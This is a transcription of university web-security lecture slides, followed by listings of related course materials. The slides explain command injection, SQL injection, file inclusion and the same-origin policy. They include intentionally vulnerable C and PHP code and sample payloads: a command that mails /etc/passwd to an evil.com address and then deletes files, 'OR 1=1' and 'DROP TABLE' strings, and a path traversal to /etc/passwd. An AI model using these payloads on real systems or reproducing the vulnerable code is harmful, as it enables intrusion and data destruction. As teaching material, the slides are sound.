Web Security, Part 1 (as usual, thanks to Dave Wagner and Vern Paxson)
|
|
- Mariah Smith
- 6 years ago
- Views:
Transcription
1 Web Security, Part 1 (as usual, thanks to Dave Wagner and Vern Paxson)
2 Web Server Threats What can happen? Compromise Defacement Gateway to attacking clients Disclosure (not mutually exclusive) And what makes the problem particularly tricky? Public access Mission creep
3
4
5
6
7
8
9
10
11
12
13
14
15
16 Attacking Via HTTP " URLs: Global identifiers of network-retrievable resources Protocol Username Host Port Path Fragment Query Password 16
17 Simple Service Example Allow users to search the local phonebook for any entries that match a regular expression Invoked via URL like: So for example: vern searches phonebook for any entries with daw or vern in them (Note: web surfer doesn t enter this URL themselves; an HTML form constructs it from what they type)
18 Simple Service Example, con t Assume our server has some glue that parses URLs to extract parameters into C variables and returns stdout to the user Simple version of code to implement search: /* print any employees whose name * matches the given regex */ void find_employee(char *regex) { char cmd[512]; sprintf(cmd, "grep %s phonebook.txt", regex); system(cmd); }
19 Simple Service Example, con t Assume our server has some glue that parses URLs to extract parameters into C variables and returns stdout to the user Simple version of code to implement search: /* print any employees whose name * matches the given regex */ void find_employee(char *regex) { char cmd[512]; snprintf(cmd, sizeof cmd, "grep %s phonebook.txt", regex); system(cmd); } Are we done?
20 A Digression into Breakfast Cereals 2600 Hz tone a form of inband signaling Beware allowing control information to come from data (also illustrates security-by-obscurity)
21 /* print any employees whose name * matches the given regex */ void find_employee(char *regex) { char cmd[512]; snprintf(cmd, sizeof cmd, "grep %s phonebook.txt", regex); system(cmd); } Problems? Instead of vern How about %20mail %20-s%20hacker@evil.com%20</etc/passwd;%20rm
22 How To Fix Command Injection? snprintf(cmd, sizeof cmd, "grep %s phonebook.txt", regex); regex=foo ; mail -s hacker@evil.com </etc/passwd; rm Okay, then scan regex and strip - does that work? regex=o Malley Okay, then scan regex and escape.? regex O\ Malley (not actually quite right, but ignore that) regex=foo\ ; mail regex=foo\\ ; mail (argument to grep is foo\ ) Okay, then scan regex and escape and \.? regex=foo\ ; mail regex=foo\\\ ; mail (argument to grep is foo\ ; mail )
23 Input Sanitization In principle, can prevent injection attacks by properly sanitizing input Remove inputs with meta-characters (can have collateral damage for benign inputs) Or escape any meta-characters (including escape characters!) Requires a complete model of how input subsequently processed E.g. regex=foo%27; mail E.g. regex=foo%25%32%37; mail» Double-escaping bug And/or: avoid using a feature-rich API KISS + defensive programming
24 /* print any employees whose name * matches the given regex */ void find_employee(char *regex) { char *path = "/usr/bin/grep"; char *argv[10];/* room for plenty of args */ char *envp[1]; /* no room since no env. */ int argc = 0; } argv[argc++] = path;/* argv[0] = prog name */ argv[argc++] = "-e";/* force regex as pat.*/ argv[argc++] = regex; argv[argc++] = "phonebook.txt"; argv[argc++] = 0; envp[0] = 0; if ( execve(path, argv, envp) < 0 ) command_failed(...);
25 Command Injection in the Real World
26 Command Injection in the Real World
27 Structure of Modern Web Services Browser URL / Form Web page built from database Web server command.php? arg1=x&arg2=y Database server
28 PHP: Hypertext Preprocessor Server scripting language with C-like syntax Can intermingle static HTML and code <input value=<?php echo $myvalue;?>> Can embed variables in double- strings $user = world ; echo Hello $user! ; Or $user = world ; echo Hello. $user.! ; Form data in global arrays $_GET, $_POST,
29 SQL Widely used database query language Fetch a set of records SELECT * FROM Person WHERE Username= oski Add data to the table INSERT INTO Person (Username, Balance) VALUES ( oski, 10) Modify data UPDATE Person SET Balance=42 WHERE Username= oski Query syntax (mostly) independent of vendor
30 SQL Injection Scenario Sample PHP $recipient = $_POST[ recipient ]; $sql = "SELECT PersonID FROM Person WHERE Balance < 100 AND Username='$recipient' "; $rs = $db->executequery($sql); How can recipient cause trouble here? How can we see anyone s balance?
31 SQL Injection Scenario, con t WHERE Balance < 100 AND Username='$recipient' "; recipient = foo' OR 1=1 -- ( -- is a comment, it masks the lack of close ) Or foo'; DROP TABLE Person; --? Or change database however you wish
32 SQL Injection: Retrieving Data 1 post malicious form Victim Server Attacker 2 unintended query 3 receive valuable data Victim SQL DB
33 SQL Injection: Modifying Data 1 post malicious form Victim Server Attacker 2 unintended command 3 Database modified Victim SQL DB
34 Defenses (work-in-progress) Defenses (work in progress) Character-level taint tracking: Check that keywords, metachars are untainted. SELECT u FROM t WHERE n='bobby' SELECT u FROM t WHERE n='bobby' OR 1=1 --' Secure template languages: Template languages should automatically quote or encode substitutions appropriately. <P>Hello ${username}! Welcome back.
35 Injection via file inclusion 2. PHP code executed by server 3. Now suppose COLOR= Or: COLOR=../../../etc/passwd%00 1. Form displayed in user s browser
36 Questions?
37
38
39
40
41
42
43
44
45
46
47 Coming Up Friday s lecture: Buffer Overflow attacks Read P&P 3.0, 3.1, 3.2 Follow the newsgroup If you are also enrolled in CS160 or CS164 and need to take the final at the alternate time, sign up via the web Due Thu Jan 28 (11:59PM): Get your class account set up Use it to submit a writeup that you have read the class web page, including (especially) policies on collaboration, Academic Dishonesty, and ethics/ legality
48 Safe to type your password? 48
49 Safe to type your password? 49
50 Safe to type your password? 50
51 Safe to type your password??????? 51
52 Safe to type your password? 52
53 Same-Origin Policy How does the browser isolate different sites? 53
54 Windows Interact 54
55 Are all interactions good? 55
56 Browser Same-Origin Policy " Different origins have limited interaction " Origin is the tuple <domain, port, protocol> Full access Limited access 56
57 Same-Origin Policy Examples " Example HTML at <iframe src=" <img src=" " Disallowed: alert(frames[0].document.body.innerhtml) alert(frames[0].location) " Allowed: alert(images[0].height) frames[0].location = " 57
58 Mixed Content 58 58
59 A Guninski Attack awglogin window.open(" "awglogin"); 59
60 What should the policy be? Child Sibling Frame Bust Descendant 60
61 Building up Web Pages from SQL <?php $result = mysql_query( "SELECT * from users where username=". $_POST['username']. " AND password=". $_POST['password']); $row = mysql_fetch_array($result)...?> <html><body> Welcome <?php print $row['username']?> </body></html>
Denial-of-Service (DoS) & Web Attacks
Denial-of-Service (DoS) & Web Attacks CS 161: Computer Security Prof. Vern Paxson TAs: Devdatta Akhawe, Mobin Javed & Matthias Vallentin http://inst.eecs.berkeley.edu/~cs161/ February 17, 2011 Goals For
More informationDenial-of-Service (DoS) & Web Attacks
Denial-of-Service (DoS) & Web Attacks CS 161: Computer Security Prof. Vern Paxson TAs: Devdatta Akhawe, Mobin Javed & Matthias Vallentin http://inst.eecs.berkeley.edu/~cs161/ February 17, 2011 Goals For
More informationWeb Security, Part 1 (as usual, thanks to Dave Wagner and Vern Paxson)
Web Security, Part 1 (as usual, thanks to Dave Wagner and Vern Paxson) Web Server Threats What can happen? Compromise Defacement Gateway to attacking clients Disclosure (not mutually exclusive) And what
More informationDenial-of-Service, con t / Web Security
Denial-of-Service, con t / Web Security CS 161: Computer Security Prof. Vern Paxson TAs: Jethro Beekman, Mobin Javed, Antonio Lupher, Paul Pearce & Matthias Vallentin http://inst.eecs.berkeley.edu/~cs161/
More informationWeb Attacks, con t. CS 161: Computer Security. Prof. Vern Paxson. TAs: Devdatta Akhawe, Mobin Javed & Matthias Vallentin
Web Attacks, con t CS 161: Computer Security Prof. Vern Paxson TAs: Devdatta Akhawe, Mobin Javed & Matthias Vallentin http://inst.eecs.berkeley.edu/~cs161/ February 22, 2011 Announcements See Still confused
More informationNET 311 INFORMATION SECURITY
NET 311 INFORMATION SECURITY Networks and Communication Department Lec12: Software Security / Vulnerabilities lecture contents: o Vulnerabilities in programs Buffer Overflow Cross-site Scripting (XSS)
More informationWeb Security: Vulnerabilities & Attacks
Computer Security Course. Song Dawn Web Security: Vulnerabilities & Attacks Cross-site Scripting What is Cross-site Scripting (XSS)? Vulnerability in web application that enables attackers to inject client-side
More informationWeb Security. Attacks on Servers 11/6/2017 1
Web Security Attacks on Servers 11/6/2017 1 Server side Scripting Javascript code is executed on the client side on a user s web browser Server side code is executed on the server side. The server side
More informationWeb Security IV: Cross-Site Attacks
1 Web Security IV: Cross-Site Attacks Chengyu Song Slides modified from Dawn Song 2 Administrivia Lab3 New terminator: http://www.cs.ucr.edu/~csong/sec/17/l/new_terminator Bonus for solving the old one
More informationWeb Attacks, con t. CS 161: Computer Security. Prof. Vern Paxson. TAs: Devdatta Akhawe, Mobin Javed & Matthias Vallentin
Web Attacks, con t CS 161: Computer Security Prof. Vern Paxson TAs: Devdatta Akhawe, Mobin Javed & Matthias Vallentin http://inst.eecs.berkeley.edu/~cs161/ February 24, 2011 Announcements Guest lecture
More informationDEFENSIVE PROGRAMMING. Lecture for EDA 263 Magnus Almgren Department of Computer Science and Engineering Chalmers University of Technology
DEFENSIVE PROGRAMMING Lecture for EDA 263 Magnus Almgren Department of Computer Science and Engineering Chalmers University of Technology Traditional Programming When writing a program, programmers typically
More informationSecure Programming. Input Validation. Learning objectives Code Injection: Outline. 4 Code Injection
Secure Programming Input Validation 2 Learning objectives Understand the definition of code injection Know how code injection happens Learn how to perform input validation and cleansing 1 Ahmet Burak Can
More informationCSE 127 Computer Security
CSE 127 Computer Security Fall 2015 Web Security I: SQL injection Stefan Savage The Web creates new problems Web sites are programs Partially implemented in browser» Javascript, Java, Flash Partially implemented
More informationApplication vulnerabilities and defences
Application vulnerabilities and defences In this lecture We examine the following : SQL injection XSS CSRF SQL injection SQL injection is a basic attack used to either gain unauthorized access to a database
More informationCS 161 Computer Security
Paxson Spring 2017 CS 161 Computer Security Midterm 1 Print your name:, (last) (first) I am aware of the Berkeley Campus Code of Student Conduct and acknowledge that any academic misconduct will be reported
More informationSecure Programming Lecture 7: Injection
Secure Programming Lecture 7: Injection David Aspinall, Informatics @ Edinburgh 10th February 2017 Outline Ranking vulnerabilities by type Trust assumptions Command injection Meta-characters in shell commands
More informationProject 3 Web Security Part 1. Outline
Project 3 Web Security Part 1 CS155 Indrajit Indy Khare Outline Quick Overview of the Technologies HTML (and a bit of CSS) Javascript PHP Assignment Assignment Overview Example Attack 1 New to web programming?
More informationCS 161 Computer Security
Raluca Ada Popa Spring 2018 CS 161 Computer Security Discussion 9 Week of March 19, 2018 Question 1 Warmup: SOP (15 min) The Same Origin Policy (SOP) helps browsers maintain a sandboxed model by preventing
More informationCSE361 Web Security. Attacks against the server-side of web applications. Nick Nikiforakis
CSE361 Web Security Attacks against the server-side of web applications Nick Nikiforakis nick@cs.stonybrook.edu Threat model In these scenarios: The server is benign The client is malicious The client
More informationP2_L12 Web Security Page 1
P2_L12 Web Security Page 1 Reference: Computer Security by Stallings and Brown, Chapter (not specified) The web is an extension of our computing environment, because most of our daily tasks involve interaction
More informationAssignment 6: Web Security
COS 432 November 20, 2017 Information Security Assignment 6: Web Security Assignment 6: Web Security This project is due on Monday, December 4 at 11:59 p.m.. Late submissions will be penalized by 10% per
More informationThe Most Dangerous Software Errors
What is CWE? What is CWE? Secure Programming Lecture 7: Injection David Aspinall, Informatics @ Edinburgh 5th February 2016 Idea: organise CVEs into categories of problem Use categories to describe scope
More informationConfiguring User Defined Patterns
The allows you to create customized data patterns which can be detected and handled according to the configured security settings. The uses regular expressions (regex) to define data type patterns. Custom
More informationProject 2: Web Security
EECS 388 September 30, 2016 Intro to Computer Security Project 2: Web Security Project 2: Web Security This project is due on Thursday, October 13 at 6 p.m. and counts for 8% of your course grade. Late
More informationFinding Vulnerabilities in Web Applications
Finding Vulnerabilities in Web Applications Christopher Kruegel, Technical University Vienna Evolving Networks, Evolving Threats The past few years have witnessed a significant increase in the number of
More informationWeb insecurity Security strategies General security Listing of server-side risks Language specific security. Web Security.
Web Security Web Programming Uta Priss ZELL, Ostfalia University 2013 Web Programming Web Security Slide 1/25 Outline Web insecurity Security strategies General security Listing of server-side risks Language
More informationCS 161 Computer Security
Paxson Spring 2017 CS 161 Computer Security Discussion 4 Week of February 13, 2017 Question 1 Clickjacking (5 min) Watch the following video: https://www.youtube.com/watch?v=sw8ch-m3n8m Question 2 Session
More informationWEB SECURITY: XSS & CSRF
WEB SECURITY: XSS & CSRF CMSC 414 FEB 22 2018 Cross-Site Request Forgery (CSRF) URLs with side-effects http://bank.com/transfer.cgi?amt=9999&to=attacker GET requests should have no side-effects, but often
More informationWeb Security Part 2. Professor Ristenpart h9p:// rist at cs dot wisc dot edu
Web Security Part 2 CS642: Computer Security Professor Ristenpart h9p://www.cs.wisc.edu/~rist/ rist at cs dot wisc dot edu Liberal borrowing from Mitchell, Boneh, Stanford CS 155 University of Wisconsin
More informationWeb Security Part 2. Professor Ristenpart h9p://www.cs.wisc.edu/~rist/ rist at cs dot wisc dot edu
Web Security Part 2 CS642: Computer Security Professor Ristenpart h9p://www.cs.wisc.edu/~rist/ rist at cs dot wisc dot edu Liberal borrowing from Mitchell, Boneh, Stanford CS 155 University of Wisconsin
More informationCSCE 548 Building Secure Software SQL Injection Attack
CSCE 548 Building Secure Software SQL Injection Attack Professor Lisa Luo Spring 2018 Previous class DirtyCOW is a special type of race condition problem It is related to memory mapping We learned how
More informationI n p u t. This time. Security. Software. sanitization ); drop table slides. Continuing with. Getting insane with. New attacks and countermeasures:
This time Continuing with Software Security Getting insane with I n p u t sanitization ); drop table slides New attacks and countermeasures: SQL injection Background on web architectures A very basic web
More informationPHP-security Software lifecycle General Security Webserver security PHP security. Security Summary. Server-Side Web Languages
Security Summary Server-Side Web Languages Uta Priss School of Computing Napier University, Edinburgh, UK Copyright Napier University Security Summary Slide 1/15 Outline PHP-security Software lifecycle
More informationDetecting Attacks, Part 1
Detecting Attacks, Part 1 CS 161 - Computer Security Profs. Vern Paxson & David Wagner TAs: John Bethencourt, Erika Chin, Matthew Finifter, Cynthia Sturton, Joel Weinberger http://inst.eecs.berkeley.edu/~cs161/
More informationWeb Security. advanced topics on SOP. Yan Huang. Credits: slides adapted from Stanford and Cornell Tech
Web Security advanced topics on SOP Yan Huang Credits: slides adapted from Stanford and Cornell Tech Same Origin Policy protocol://domain:port/path?params Same Origin Policy (SOP) for DOM: Origin A can
More informationHomework 5: Exam Review
CIS 331 April 18, 2017 Introduction to Networks & Security Homework 5: Exam Review Homework 5: Exam Review This homework is due Wednesday, April 26 at 10 p.m.. You will have a budget of five late days
More informationAdvanced Web Technology 10) XSS, CSRF and SQL Injection
Berner Fachhochschule, Technik und Informatik Advanced Web Technology 10) XSS, CSRF and SQL Injection Dr. E. Benoist Fall Semester 2010/2011 1 Table of Contents Cross Site Request Forgery - CSRF Presentation
More informationPHP: Hypertext Preprocessor. A tutorial Introduction
PHP: Hypertext Preprocessor A tutorial Introduction Introduction PHP is a server side scripting language Primarily used for generating dynamic web pages and providing rich web services PHP5 is also evolving
More informationWeb basics: HTTP cookies
Web basics: HTTP cookies Myrto Arapinis School of Informatics University of Edinburgh February 11, 2016 1 / 27 How is state managed in HTTP sessions HTTP is stateless: when a client sends a request, the
More informationAttacks Against Websites. Tom Chothia Computer Security, Lecture 11
Attacks Against Websites Tom Chothia Computer Security, Lecture 11 A typical web set up TLS Server HTTP GET cookie Client HTML HTTP file HTML PHP process Display PHP SQL Typical Web Setup HTTP website:
More informationHow is state managed in HTTP sessions. Web basics: HTTP cookies. Hidden fields (2) The principle. Disadvantage of this approach
Web basics: HTTP cookies Myrto Arapinis School of Informatics University of Edinburgh March 30, 2015 How is state managed in HTTP sessions HTTP is stateless: when a client sends a request, the server sends
More informationPHP INTERVIEW QUESTION-ANSWERS
1. What is PHP? PHP (recursive acronym for PHP: Hypertext Preprocessor) is the most widely used open source scripting language, majorly used for web-development and application development and can be embedded
More informationCSE 565 Computer Security Fall 2018
CSE 565 Computer Security Fall 2018 Lecture 15: Software Security II Department of Computer Science and Engineering University at Buffalo 1 Software Vulnerabilities Buffer overflow vulnerabilities account
More informationLecture 17 Browser Security. Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017 Some slides from Bailey's ECE 422
Lecture 17 Browser Security Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017 Some slides from Bailey's ECE 422 Documents Browser's fundamental role is to display documents comprised
More informationCS 161 Computer Security
Nick Weaver Fall 2018 CS 161 Computer Security Homework 3 Due: Friday, 19 October 2018, at 11:59pm Instructions. This homework is due Friday, 19 October 2018, at 11:59pm. No late homeworks will be accepted
More informationA1 (Part 2): Injection SQL Injection
A1 (Part 2): Injection SQL Injection SQL injection is prevalent SQL injection is impactful Why a password manager is a good idea! SQL injection is ironic SQL injection is funny Firewall Firewall Accounts
More informationWeb Security. Jace Baker, Nick Ramos, Hugo Espiritu, Andrew Le
Web Security Jace Baker, Nick Ramos, Hugo Espiritu, Andrew Le Topics Web Architecture Parameter Tampering Local File Inclusion SQL Injection XSS Web Architecture Web Request Structure Web Request Structure
More informationCS 161 Computer Security
Paxson Spring 2017 CS 161 Computer Security Discussion 12 Week of April 24, 2017 Question 1 Detection strategies (20 min) Suppose you are responsible for detecting attacks on the UC Berkeley network, and
More informationRunning Remote Code is Risky. Why Study Browser Security. Browser Sandbox. Threat Models. Security User Interface.
CSE 127 Winter 2008 Security Collin Jackson Running Remote Code is Risky Compromise Host Write to file system Interfere with other processes Steal information Read file system Read information associated
More informationBOOSTING THE SECURITY
BOOSTING THE SECURITY OF YOUR ANGULAR APPLICATION Philippe De Ryck March 2017 https://www.websec.be ANGULAR APPLICATIONS RUN WITHIN THE BROWSER JS code HTML code Load application JS code / HTML code JS
More informationOutline. Security as an economic good. Risk budgeting with ALE. Failure: Risk compensation. Failure: Displacement activity
CSci 5271 Introduction to Computer Security Day 2: Intro to Software and OS Security Stephen McCamant University of Minnesota, Computer Science & Engineering Security as an economic good Security is a
More informationinjection vulnerabilities
injection vulnerabilities 1 Changelog 1 Corrections made in this version not in first posting: 17 April 2017: slide 35: make note on slide of second escaping s misinterpretation Last time 2 static analysis
More informationWeb Security, Part 2
Web Security, Part 2 CS 161 - Computer Security Profs. Vern Paxson & David Wagner TAs: John Bethencourt, Erika Chin, Matthew Finifter, Cynthia Sturton, Joel Weinberger http://inst.eecs.berkeley.edu/~cs161/
More information2/16/18. CYSE 411/AIT 681 Secure Software Engineering. Secure Coding. The Web. Topic #11. Web Security. Instructor: Dr. Kun Sun
CYSE 411/AIT 681 Secure Software Engineering Topic #11. Web Security Instructor: Dr. Kun Sun Secure Coding String management Pointer Subterfuge Dynamic memory management Integer security Formatted output
More informationWeb basics: HTTP cookies
Web basics: HTTP cookies Myrto Arapinis School of Informatics University of Edinburgh November 20, 2017 1 / 32 How is state managed in HTTP sessions HTTP is stateless: when a client sends a request, the
More informationWeb Security: Cross-Site Attacks
Web Security: Cross-Site Attacks CS 161: Computer Security Prof. Vern Paxson TAs: Paul Bramsen, Apoorva Dornadula, David Fifield, Mia Gil Epner, David Hahn, Warren He, Grant Ho, Frank Li, Nathan Malkin,
More informationClient Side Injection on Web Applications
Client Side Injection on Web Applications Author: Milad Khoshdel Blog: https://blog.regux.com Email: miladkhoshdel@gmail.com 1 P a g e Contents INTRODUCTION... 3 HTML Injection Vulnerability... 4 How to
More informationWeb Security: Vulnerabilities & Attacks
Computer Security Course. Song Dawn Web Security: Vulnerabilities & Attacks Slide credit: John Mitchell Dawn Song Security User Interface Dawn Song Safe to type your password? SAFEBANK Bank of the Safe
More informationLecture 4 September Required reading materials for this class
EECS 261: Computer Security Fall 2007 Lecture 4 September 6 Lecturer: David Wagner Scribe: DK Moon 4.1 Required reading materials for this class Beyond Stack Smashing: Recent Advances in Exploiting Buffer
More informationOWASP 5/07/09. The OWASP Foundation OWASP Static Analysis (SA) Track Session 1: Intro to Static Analysis
Static Analysis (SA) Track Session 1: Intro to Static Analysis Eric Dalci Cigital edalci at cigital dot com 5/07/09 Copyright The Foundation Permission is granted to copy, distribute and/or modify this
More informationIs Browsing Safe? Web Browser Security. Subverting the Browser. Browser Security Model. XSS / Script Injection. 1. XSS / Script Injection
Is Browsing Safe? Web Browser Security Charlie Reis Guest Lecture - CSE 490K - 5/24/2007 Send Spam Search Results Change Address? Install Malware Web Mail Movie Rentals 2 Browser Security Model Pages are
More informationRunning SQL in Java and PHP
Running SQL in Java and PHP FCDB 9.6 9.7 Dr. Chris Mayfield Department of Computer Science James Madison University Feb 28, 2018 Introduction to JDBC JDBC = Java Database Connectivity 1. Connect to the
More informationIS 2150 / TEL 2810 Introduction to Security
IS 2150 / TEL 2810 Introduction to Security James Joshi Professor, SIS Lecture 15 April 20, 2016 SQL Injection Cross-Site Scripting 1 Goals Overview SQL Injection Attacks Cross-Site Scripting Attacks Some
More informationA SQL Injection : Internal Investigation of Injection, Detection and Prevention of SQL Injection Attacks
A SQL Injection : Internal Investigation of Injection, Detection and Prevention of SQL Injection Attacks Abhay K. Kolhe Faculty, Dept. Of Computer Engineering MPSTME, NMIMS Mumbai, India Pratik Adhikari
More informationCS 155 Final Exam. CS 155: Spring 2016 June 2, 2016
CS 155: Spring 2016 June 2, 2016 CS 155 Final Exam This exam is open book and open notes. You may use course notes and documents that you have stored on a laptop, but you may NOT use the network connection
More informationSolution of Exercise Sheet 5
Foundations of Cybersecurity (Winter 16/17) Prof. Dr. Michael Backes CISPA / Saarland University saarland university computer science Solution of Exercise Sheet 5 1 SQL Injection Consider a website foo.com
More informationSecurity: Threats and Countermeasures. Stanley Tan Academic Program Manager Microsoft Singapore
Security: Threats and Countermeasures Stanley Tan Academic Program Manager Microsoft Singapore Session Agenda Types of threats Threats against the application Countermeasures against the threats Types
More informationRunning SQL in Java and PHP
Running SQL in Java and PHP FCDB 9.6 9.7 Dr. Chris Mayfield Department of Computer Science James Madison University Mar 01, 2017 Introduction to JDBC JDBC = Java Database Connectivity 1. Connect to the
More informationSQL Injection SPRING 2018: GANG WANG
SQL Injection SPRING 2018: GANG WANG SQL Injection Another reason to validate user input data Slides credit to Neil Daswani and Adam Doupé 2 3 http://xkcd.com/327/ Produce More Secure Code Operating system
More informationA1 (Part 1): Injection Command and Code injection
A1 (Part 1): Injection Command and Code injection A1 Injection Tricking an application into executing commands or code embedded in data Data and code mixing! Often injected into interpreters SQL, PHP,
More informationCS 155 Project 2. Overview & Part A
CS 155 Project 2 Overview & Part A Project 2 Web application security Composed of two parts Part A: Attack Part B: Defense Due date: Part A: May 5th (Thu) Part B: May 12th (Thu) Project 2 Ruby-on-Rails
More informationApplication Design and Development: October 30
M149: Database Systems Winter 2018 Lecturer: Panagiotis Liakos Application Design and Development: October 30 1 Applications Programs and User Interfaces very few people use a query language to interact
More informationUsing the Cisco ACE Application Control Engine Application Switches with the Cisco ACE XML Gateway
Using the Cisco ACE Application Control Engine Application Switches with the Cisco ACE XML Gateway Applying Application Delivery Technology to Web Services Overview The Cisco ACE XML Gateway is the newest
More informationA SURVEY OF ATTACKS ON PHP AND WEB VULNERABILITIES
INTERNATIONAL JOURNAL OF RESEARCH IN COMPUTER APPLICATIONS AND ROBOTICS ISSN 2320-7345 A SURVEY OF ATTACKS ON PHP AND WEB VULNERABILITIES Venkatesh Yerram 1, Dr G.Venkat Rami Reddy 2 ¹Computer Networks
More informationDaniel Pittman October 17, 2011
Daniel Pittman October 17, 2011 SELECT target-list FROM relation-list WHERE qualification target-list A list of attributes of relations in relation-list relation-list A list of relation names qualification
More informationWeb Security: Vulnerabilities & Attacks
Computer Security Course. Web Security: Vulnerabilities & Attacks Type 2 Type 1 Type 0 Three Types of XSS Type 2: Persistent or Stored The attack vector is stored at the server Type 1: Reflected The attack
More informationApplication Layer Attacks. Application Layer Attacks. Application Layer. Application Layer. Internet Protocols. Application Layer.
Application Layer Attacks Application Layer Attacks Week 2 Part 2 Attacks Against Programs Application Layer Application Layer Attacks come in many forms and can target each of the 5 network protocol layers
More informationWeb Application Security. Philippe Bogaerts
Web Application Security Philippe Bogaerts OWASP TOP 10 3 Aim of the OWASP Top 10 educate developers, designers, architects and organizations about the consequences of the most common web application security
More informationCS 161 Computer Security
Wagner Spring 2014 CS 161 Computer Security Midterm 1 Print your name:, (last) (first) I am aware of the Berkeley Campus Code of Student Conduct and acknowledge that academic misconduct will be reported
More informationlast time: command injection
Web Security 1 last time: command injection 2 placing user input in more complicated language SQL shell commands input accidentally treated as commands in language instead of single value (e.g. argument/string
More informationCSE 484 / CSE M 584: Computer Security and Privacy. Web Security. Autumn Tadayoshi (Yoshi) Kohno
CSE 484 / CSE M 584: Computer Security and Privacy Web Security Autumn 2018 Tadayoshi (Yoshi) Kohno yoshi@cs.washington.edu Thanks to Dan Boneh, Dieter Gollmann, Dan Halperin, Ada Lerner, John Manferdelli,
More informationSecurity for the Web. Thanks to Dave Levin for some slides
Security for the Web Thanks to Dave Levin for some slides The Web Security for the World-Wide Web (WWW) presents new vulnerabilities to consider: SQL injection, Cross-site Scripting (XSS), These share
More informationComputer Security 3e. Dieter Gollmann. Chapter 18: 1
Computer Security 3e Dieter Gollmann www.wiley.com/college/gollmann Chapter 18: 1 Chapter 18: Web Security Chapter 18: 2 Web 1.0 browser HTTP request HTML + CSS data web server backend systems Chapter
More informationLecture 7: Web hacking 3, SQL injection, Xpath injection, Server side template injection, File inclusion
IN5290 Ethical Hacking Lecture 7: Web hacking 3, SQL injection, Xpath injection, Server side template injection, File inclusion Universitetet i Oslo Laszlo Erdödi Lecture Overview What is SQL injection
More informationSome Facts Web 2.0/Ajax Security
/publications/notes_and_slides Some Facts Web 2.0/Ajax Security Allen I. Holub Holub Associates allen@holub.com Hackers attack bugs. The more complex the system, the more bugs it will have. The entire
More informationWEB SECURITY WORKSHOP TEXSAW Presented by Solomon Boyd and Jiayang Wang
WEB SECURITY WORKSHOP TEXSAW 2014 Presented by Solomon Boyd and Jiayang Wang Introduction and Background Targets Web Applications Web Pages Databases Goals Steal data Gain access to system Bypass authentication
More informationWeb Application & Web Server Vulnerabilities Assessment Pankaj Sharma
Web Application & Web Server Vulnerabilities Assessment Pankaj Sharma Indian Computer Emergency Response Team ( CERT - IN ) Department Of Information Technology 1 Agenda Introduction What are Web Applications?
More informationCS 377 Database Systems. Li Xiong Department of Mathematics and Computer Science Emory University
CS 377 Database Systems Database Programming in PHP Li Xiong Department of Mathematics and Computer Science Emory University Outline A Simple PHP Example Overview of Basic Features of PHP Overview of PHP
More informationSecurity for the Web. Thanks to Dave Levin for some slides
Security for the Web Thanks to Dave Levin for some slides The Web Security for the World-Wide Web (WWW) presents new vulnerabilities to consider: SQL injection, Cross-site Scripting (XSS), These share
More informationChapter. Accessing MySQL Databases Using PHP
Chapter 12 Accessing MySQL Databases Using PHP 150 Essential PHP fast Introduction In the previous chapter we considered how to create databases using MySQL. While this is useful, it does not enable us
More informationCode-Injection Attacks in Browsers Supporting Policies. Elias Athanasopoulos, Vasilis Pappas, and Evangelos P. Markatos FORTH-ICS
Code-Injection Attacks in Browsers Supporting Policies Elias Athanasopoulos, Vasilis Pappas, and Evangelos P. Markatos FORTH-ICS What is all about? New code-injection attacks or return-to-libc attacks
More informationDepartment of Electrical Engineering and Computer Science MASSACHUSETTS INSTITUTE OF TECHNOLOGY Fall Quiz I
Department of Electrical Engineering and Computer Science MASSACHUSETTS INSTITUTE OF TECHNOLOGY 6.858 Fall 2010 Quiz I All problems are open-ended questions. In order to receive credit you must answer
More informationSQL Injection. EECS Introduction to Database Management Systems
SQL Injection EECS3421 - Introduction to Database Management Systems Credit "Foundations of Security: What Every Programmer Needs To Know" (Chapter 8) by Neil Daswani, Christoph Kern, and Anita Kesavan
More informationJohn Coggeshall Copyright 2006, Zend Technologies Inc.
PHP Security Basics John Coggeshall Copyright 2006, Zend Technologies Inc. Welcome! Welcome to PHP Security Basics Who am I: John Coggeshall Lead, North American Professional Services PHP 5 Core Contributor
More informationWeb Security. Outline
Security CS 161/194-1 Anthony D. Joseph November 21, 2005 s Outline Static and Dynamic Content Firewall review Adding a DMZ Secure Topologies 2 1 Polls How many people have set up a personal web server?
More informationPHP: Cookies, Sessions, Databases. CS174. Chris Pollett. Sep 24, 2008.
PHP: Cookies, Sessions, Databases. CS174. Chris Pollett. Sep 24, 2008. Outline. How cookies work. Cookies in PHP. Sessions. Databases. Cookies. Sometimes it is useful to remember a client when it comes
More informationL6 Application Programming. Thibault Sellam Fall 2018
L6 Application Programming Thibault Sellam Fall 2018 Topics Interfacing with applications Database APIs (DBAPIS) Cursors SQL!= Programming Language Not a general purpose programming language Tailored for
More informationCS 161 Computer Security
Raluca Popa Spring 2018 CS 161 Computer Security Homework 1 Due: Monday, January 29th, at 11:59pm Instructions. This homework is due Monday, January 29th, at 11:59pm. No late homeworks will be accepted
More informationSoftware Security. Erik Poll. Digital Security group Radboud University Nijmegen
Tackling Software Security problems Erik Poll Digital Security group Radboud University Nijmegen 1 Erik Poll Recall: input attacks malicious input application a bug! malicious input application (abuse
More informationHTTP. EC512 Spring /15/2015 EC512 - Prof. Thomas Skinner 1
HTTP EC512 Spring 2015 2/15/2015 EC512 - Prof. Thomas Skinner 1 HTTP HTTP is the standard protocol used between a web browser and a web server. It is standardized by the World Wide Web Consortium, W3C
More information